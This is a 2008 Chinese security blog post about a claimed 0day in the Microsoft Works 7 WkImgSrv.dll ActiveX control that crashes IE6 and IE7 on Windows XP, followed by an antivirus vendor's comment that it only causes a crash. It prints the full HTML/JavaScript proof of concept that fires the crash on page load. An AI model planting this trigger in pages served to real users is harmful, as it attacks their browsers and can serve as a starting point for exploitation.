夜火博客

Windows组件0Day漏洞　通杀IE6与IE7浏览器

2008-4-22 20:51:42  分类:漏洞信息  作者:xloong 已被围观loading 次 被网友评论0条 我要评论

中国IT实验室4月21日报道：近日收到网友发来的邮件，反映了一个Windows 0Day漏洞。并在其博客中给出了相关代码。

[0day]Microsoft Works 7 WkImgSrv.dll crash POC，dll版本7.03.0616.0，IE7+Windows XP SP2 测试通过。

[html]
[head]
[title]Microsoft Works 7 WkImgSrv.dll crash POC[/title]
[script language="JavaScript"]
 function payload() {
 var num = -1;
 obj.WksPictureInterface = num;
 }
 [/script]
[/head]
[body onload="JavaScript: return payload();"]
[object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"]
[/object]
[/body]
[/html]

与金山专家李铁军联系，得到了珠海研发中心的回复，如下：

近几天网络上流传着一个传说为IE 0DAY的POC代码，在Windows XP系统环境下通杀了IE6和IE7，其它系统并未经过测试。其实这个漏洞并不是存在于IE，而是Microsoft Works的组件被挖掘出漏洞，部分的Windows XP预装了Microsoft Works，所以就出现了过全补丁系统的漏洞（如华硕易PC 就预装了Microsoft Works）。这段攻击代码会让浏览器崩溃，目前尚不能因此传播恶意软件。

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载，请注明： 转自：夜火博客 [ http://www.15897.com/ ]

本文链接地址： http://www.15897.com/blog/post/Windows-Microsoft-Works-0day.html

Tags: 0day   Windows  

已有0位网友对本文做了一针见血的评论 【我要评论】